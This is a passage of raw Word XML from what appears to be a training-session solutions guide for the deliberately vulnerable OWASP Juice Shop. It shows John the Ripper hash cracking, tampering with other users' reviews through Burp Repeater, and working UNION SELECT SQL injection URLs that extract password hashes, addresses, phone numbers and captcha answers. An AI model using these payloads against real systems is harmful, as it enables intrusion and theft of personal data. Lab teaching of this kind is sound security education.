          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:r w:rsidR="00996882" w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> --format=Raw-MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763BA8" w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911741B" w14:textId="77777777" w:rsidR="00AD7DD2" w:rsidRDefault="00996882" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44F0B53F" wp14:editId="3EB543DB">
            <wp:extent cx="5731510" cy="6369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36905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17924E38" w14:textId="522CA169" w:rsidR="00996882" w:rsidRDefault="00AD7DD2" w:rsidP="00AD7DD2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Showing results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB7872" w14:textId="54461C0E" w:rsidR="007677FF" w:rsidRDefault="007677FF" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">Keep checking until </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>you’ve</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> got them al</w:t>
      </w:r>
      <w:r w:rsidR="002B0482">
        <w:t>l!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF1CBF" w14:textId="29CD43AF" w:rsidR="00F40B1C" w:rsidRDefault="00F40B1C" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">Note: Sometimes </w:t>
      </w:r>
      <w:r w:rsidR="00257571">
        <w:t>a trailing newline character can be added to the end of your password file, which interferes with John. Check for this character (</w:t>
      </w:r>
      <w:r w:rsidR="00A05119">
        <w:t xml:space="preserve">hex </w:t>
      </w:r>
      <w:r w:rsidR="00257571">
        <w:t xml:space="preserve">0a) using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00257571" w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C95C0C" w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
      <w:r w:rsidR="00257571" w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00257571">
        <w:t xml:space="preserve">command – if it’s present, you can truncate your password list by one bit </w:t>
      </w:r>
      <w:r w:rsidR="00B67A2C">
        <w:t xml:space="preserve">using the </w:t>
      </w:r>
      <w:r w:rsidR="00B67A2C" w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>truncate -s $(($(stat -c '%s' passwords)-1)) passwords</w:t>
      </w:r>
      <w:r w:rsidR="00B67A2C" w:rsidRPr="00C95C0C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B67A2C">
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00D648B0">
        <w:t>. After that, you’re free to crack as normal!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378A90E" w14:textId="77777777" w:rsidR="00E042FB" w:rsidRDefault="001D1C32" w:rsidP="00E042FB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A904A1B" wp14:editId="444CFDA1">
            <wp:extent cx="4895850" cy="21718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3867" cy="2202006"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639AFA9" w14:textId="00019CA1" w:rsidR="00257571" w:rsidRDefault="00E042FB" w:rsidP="00E042FB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Fixing trailing newline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D71F4DE" w14:textId="77777777" w:rsidR="007E52FC" w:rsidRDefault="007E52FC" w:rsidP="00950BE7"/>
    <w:p w14:paraId="11782239" w14:textId="1DDF681E" w:rsidR="00985125" w:rsidRDefault="00B55C17" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidR="00985125">
        <w:t>The first step is always to create and capture a valid request to see how it works – so, login as any user</w:t>
      </w:r>
      <w:r w:rsidR="0069450E">
        <w:t xml:space="preserve"> and post a review, and edit it! You should see a PATCH request to </w:t>
      </w:r>
      <w:r w:rsidR="0069450E" w:rsidRPr="003C3ADC">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/rest/products/reviews</w:t>
      </w:r>
      <w:r w:rsidR="0069450E">
        <w:t>, as below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2B2D7A" w14:textId="77777777" w:rsidR="00EF0D0A" w:rsidRDefault="0069450E" w:rsidP="00EF0D0A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ED08899" wp14:editId="4761A5D5">
            <wp:extent cx="5731510" cy="16770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677035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAA0C36" w14:textId="26847D17" w:rsidR="0069450E" w:rsidRDefault="00EF0D0A" w:rsidP="00EF0D0A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: PATCH request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F3814" w14:textId="50D0C3D4" w:rsidR="0069450E" w:rsidRDefault="00986165" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">The two parameters are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A020BC">
        <w:t xml:space="preserve">The id looks a little nonsensical – it may be some sort of hash of the product ID and user ID, but that’s just a guess. Without a clear way of predicting what the ID will be for a certain review, we need to find a way of capturing them! You can do this by </w:t>
      </w:r>
      <w:r w:rsidR="00267518">
        <w:t xml:space="preserve">intercepting the request for opening a product in Burp – click a product and you should see a request to </w:t>
      </w:r>
      <w:r w:rsidR="00741B13" w:rsidRPr="009268BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/rest/products/productid/reviews</w:t>
      </w:r>
      <w:r w:rsidR="00741B13">
        <w:t>, where the response to the request contains the</w:t>
      </w:r>
      <w:r w:rsidR="004D08E5">
        <w:t xml:space="preserve"> information for all the reviews attached to that product, including the ID!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180B2E4" w14:textId="77777777" w:rsidR="00EF0D0A" w:rsidRDefault="00CF3296" w:rsidP="00EF0D0A">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79442848" wp14:editId="2E7182BC">
            <wp:extent cx="5731510" cy="19011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901190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F58AD5" w14:textId="1D1DCE4B" w:rsidR="00CF3296" w:rsidRPr="00986165" w:rsidRDefault="00EF0D0A" w:rsidP="00EF0D0A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Request data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7203CCA9" w14:textId="145F071A" w:rsidR="006E438A" w:rsidRDefault="00A0788B" w:rsidP="00950BE7">
      <w:r>
        <w:t xml:space="preserve">Now send the edit request to the Repeater and replace the ID with the one you just </w:t>
      </w:r>
      <w:r w:rsidR="00B82141">
        <w:t>captured, and add any message you like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7757E21B" w14:textId="77777777" w:rsidR="007D4644" w:rsidRDefault="00B82141" w:rsidP="007D4644">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17340CCF" wp14:editId="22AD0A51">
            <wp:extent cx="5924550" cy="462227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0270" cy="4642345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA0280B" w14:textId="6178F8A9" w:rsidR="00B82141" w:rsidRDefault="007D4644" w:rsidP="007D4644">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Sending the PATCH request to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09270FFF" w14:textId="40B7E42B" w:rsidR="00232278" w:rsidRDefault="00232278" w:rsidP="00950BE7">
      <w:r>
        <w:t>You should see the edited review!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68557D35" w14:textId="77777777" w:rsidR="007D4644" w:rsidRDefault="00232278" w:rsidP="007D4644">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AB5E541" wp14:editId="2B802490">
            <wp:extent cx="2876212" cy="2390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5515"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2881978" cy="2395568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EB1A29" w14:textId="06955D7C" w:rsidR="00B55C17" w:rsidRDefault="007D4644" w:rsidP="007D4644">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Successfully edited!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F7EC9" w14:textId="604FEB24" w:rsidR="00FC4032" w:rsidRDefault="00FC4032" w:rsidP="00950BE7"/>
    <w:p w14:paraId="18B4BDE1" w14:textId="29361095" w:rsidR="00EE46A1" w:rsidRDefault="00FC4032" w:rsidP="00950BE7">
      <w:r>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidR="004852FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE46A1">
        <w:t xml:space="preserve">We’ll be using a UNION SELECT query, as </w:t>
      </w:r>
      <w:r w:rsidR="00F93828">
        <w:t xml:space="preserve">covered in the session, to perform this attack. </w:t>
      </w:r>
      <w:r w:rsidR="00F44500">
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidR="003C4065">
        <w:t>recap the slides to see instructions in more detail, but here is an overview of how the attack works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A26E0D3" w14:textId="21F94901" w:rsidR="003C4065" w:rsidRDefault="003C4065" w:rsidP="003C4065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UNION SELECT appends </w:t>
      </w:r>
      <w:r w:rsidR="000723ED">
        <w:t xml:space="preserve">one query to another </w:t>
      </w:r>
      <w:r w:rsidR="007873CD">
        <w:t xml:space="preserve">– but the number of columns in the second SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="007873CD">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007873CD">
        <w:t xml:space="preserve"> be the same as the first, so we have to ‘guess’ how many columns there are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73726295" w14:textId="53C4857C" w:rsidR="00384AE9" w:rsidRDefault="00384AE9" w:rsidP="003C4065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We do this by selecting arbitrary values until we have the right number</w:t>
      </w:r>
      <w:r w:rsidR="00845B81">
        <w:t xml:space="preserve"> of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276585F" w14:textId="4635E8FB" w:rsidR="00384AE9" w:rsidRDefault="00384AE9" w:rsidP="003C4065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once we have that figured out, we </w:t>
      </w:r>
      <w:r w:rsidR="00EE03DF">
        <w:t>replace the arbitrary values with the columns we want</w:t>
      </w:r>
      <w:r w:rsidR="00AD0ECE">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00EE03DF">
        <w:t>specify the</w:t>
      </w:r>
      <w:r w:rsidR="00AD0ECE">
        <w:t xml:space="preserve"> table to select from!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33705911" w14:textId="58A381B2" w:rsidR="003C4065" w:rsidRDefault="003C4065" w:rsidP="003C4065">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>In Juice Shop specifically, we make a request to an exposed API endpoint</w:t>
      </w:r>
      <w:r w:rsidR="003B7C61">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="003B7C61" w:rsidRPr="00E12BFB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/rest/products/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B7C61" w:rsidRPr="00E12BFB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>search?q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003B7C61" w:rsidRPr="00E12BFB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="003B7C61">
        <w:t>) that is lacking the sanitisation present on the normal search box</w:t>
      </w:r>
      <w:r>
        <w:t>. We close the</w:t>
      </w:r>
      <w:r w:rsidR="00825C59">
        <w:t xml:space="preserve"> normal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> query with </w:t>
      </w:r>
      <w:r w:rsidRPr="005E03CB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘))</w:t>
      </w:r>
      <w:r w:rsidR="00825C59">
        <w:t xml:space="preserve"> and then start our UNION SELECT attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B35C17" w14:textId="14AF3870" w:rsidR="00E30A16" w:rsidRDefault="00E30A16" w:rsidP="00E30A16">
      <w:r>
        <w:t>As a recap, the URL we used to exfiltrate the schema in the session was as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114D36B" w14:textId="51AA1E8A" w:rsidR="000875B3" w:rsidRDefault="00E02904" w:rsidP="000875B3">
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="000875B3" w:rsidRPr="009942AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20sql,%20%272%27,%20%273%27,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20sqlite_master--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44AEA7CD" w14:textId="4B0F67F5" w:rsidR="000875B3" w:rsidRDefault="000875B3" w:rsidP="000875B3">
      <w:r>
        <w:t>Use this to see the names of tables you want to attack</w:t>
      </w:r>
      <w:r w:rsidR="00A97ED7">
        <w:t>, and adjust the parameters as needed! You may need to change the base of the URL depending on which platform you are using.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913F88C" w14:textId="75DBCDBB" w:rsidR="00143725" w:rsidRDefault="00143725" w:rsidP="000875B3">
      <w:r>
        <w:t xml:space="preserve">To make your results a little easier to read, you </w:t>
      </w:r>
      <w:r w:rsidR="002410F7">
        <w:t>would usually</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> use the SQL ‘AS’ keyword, which returns a column under a different name – this </w:t>
      </w:r>
      <w:r w:rsidR="00047219">
        <w:t>should override the normal column name that is returned by the query. However, as the original query (that selects from the Products table) is un</w:t>
      </w:r>
      <w:r w:rsidR="00D93D12">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00047219">
        <w:t>editable</w:t>
      </w:r>
      <w:r w:rsidR="00D93D12">
        <w:t xml:space="preserve"> we cannot change the columns in the output</w:t>
      </w:r>
      <w:r w:rsidR="006B5987">
        <w:t>. It is worth knowing this keyword in future, though, so we’ve included it in the solutions just in case!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED9413" w14:textId="77777777" w:rsidR="00143725" w:rsidRPr="000875B3" w:rsidRDefault="00143725" w:rsidP="000875B3"/>
    <w:p w14:paraId="43754A89" w14:textId="1945B7A5" w:rsidR="008F1ACE" w:rsidRDefault="008F1ACE" w:rsidP="008F1ACE">
      <w:r>
        <w:t>4.1)</w:t>
      </w:r>
      <w:r w:rsidR="0012471A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E5707">
        <w:t xml:space="preserve">Use the following URL to extract </w:t>
      </w:r>
      <w:r w:rsidR="001C09C3">
        <w:t>usernames and passwords</w:t>
      </w:r>
      <w:r w:rsidR="003E5707">
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:r w:rsidR="001C09C3">
        <w:t>Users</w:t>
      </w:r>
      <w:r w:rsidR="003E5707">
        <w:t xml:space="preserve"> table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73C507" w14:textId="4DCB8BF4" w:rsidR="00A7207C" w:rsidRDefault="00E02904" w:rsidP="008F1ACE">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00A7207C" w:rsidRPr="009942AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20username,%20password,%20%273%27,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20Users--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38A74DD0" w14:textId="195CF41A" w:rsidR="00A7207C" w:rsidRDefault="00A7207C" w:rsidP="008F1ACE">
      <w:r>
        <w:t>For 4.1 we’ll show you an example of this working</w:t>
      </w:r>
      <w:r w:rsidR="008B1971">
        <w:t xml:space="preserve"> in the browser – all the other attack payloads work in the same way!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D74F6B8" w14:textId="77777777" w:rsidR="001A2A4E" w:rsidRDefault="002C0EFB" w:rsidP="001A2A4E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14151D1C" wp14:editId="16D39C47">
            <wp:extent cx="5731510" cy="38868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86835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6B083" w14:textId="487F88EF" w:rsidR="00A7207C" w:rsidRDefault="001A2A4E" w:rsidP="001A2A4E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005C53D9">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Extracting the usernames and password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7379E37C" w14:textId="57C9A7E1" w:rsidR="002C0EFB" w:rsidRDefault="002C0EFB" w:rsidP="008F1ACE">
      <w:r>
        <w:t xml:space="preserve">You can see the hashes displayed on the screen – the </w:t>
      </w:r>
      <w:r w:rsidR="001E0491">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="001E0491">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> column is empty for most users, </w:t>
      </w:r>
      <w:r w:rsidR="001E0491">
        <w:t>but we could easily change the column to ‘email’ instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A5826" w14:textId="21E93E46" w:rsidR="001E0491" w:rsidRDefault="001E0491" w:rsidP="008F1ACE">
      <w:r>
        <w:t xml:space="preserve">4.2) Use the following URL to extract names, address, and mobile numbers from the </w:t>
      </w:r>
      <w:r w:rsidR="00BB1058">
        <w:t>Addresses table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06C96B" w14:textId="5C6D59A9" w:rsidR="00BB1058" w:rsidRDefault="00E02904" w:rsidP="008F1ACE">
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="002C756B" w:rsidRPr="009942AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20fullName,%20streetAddress,%20%27city%27,%20%27country%27,%20%27mobileNum%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20Addresses--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="114BFD6F" w14:textId="1A04DD2F" w:rsidR="00B156DB" w:rsidRDefault="00B156DB" w:rsidP="008F1ACE">
      <w:r>
        <w:t xml:space="preserve">4.3) Use the following URL to extract captcha questions and answers from the </w:t>
      </w:r>
      <w:r w:rsidR="00C53523">
        <w:t>Captchas table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A62479" w14:textId="72586B28" w:rsidR="00C53523" w:rsidRDefault="00E02904" w:rsidP="008F1ACE">
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="003E5707" w:rsidRPr="009942AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://juice-shop.herokuapp.com/rest/products/search?q=qwert%27))%20UNION%20SELECT%20captcha,%20answer,%20%273%27,%20%274%27,%20%275%27,%20%276%27,%20%277%27,%20%278%27,%20%279%27%20FROM%20Captchas--</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FDF093E" w14:textId="77777777" w:rsidR="00E14000" w:rsidRDefault="0025544F" w:rsidP="008F1ACE">
      <w:r>
        <w:t>4.4) This one is a little different, as security questions and answers are stored in two separate tables! To get them both, you could do a second UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidR="007C669D">
        <w:t xml:space="preserve"> to first get questions, and then get answers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – but then you’d have to match up </w:t>
      </w:r>
      <w:r w:rsidR="007C669D">
        <w:t>the two sets of results by eye, which is too much effort</w:t>
      </w:r>
      <w:r w:rsidR="00E14000">
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20C473" w14:textId="0095090B" w:rsidR="00B156DB" w:rsidRDefault="00E14000" w:rsidP="008F1ACE">
      <w:r>
        <w:t xml:space="preserve">Instead, we’ll use an INNER JOIN to join the two tables together – this </w:t>
      </w:r>
      <w:r w:rsidR="00A448AD">
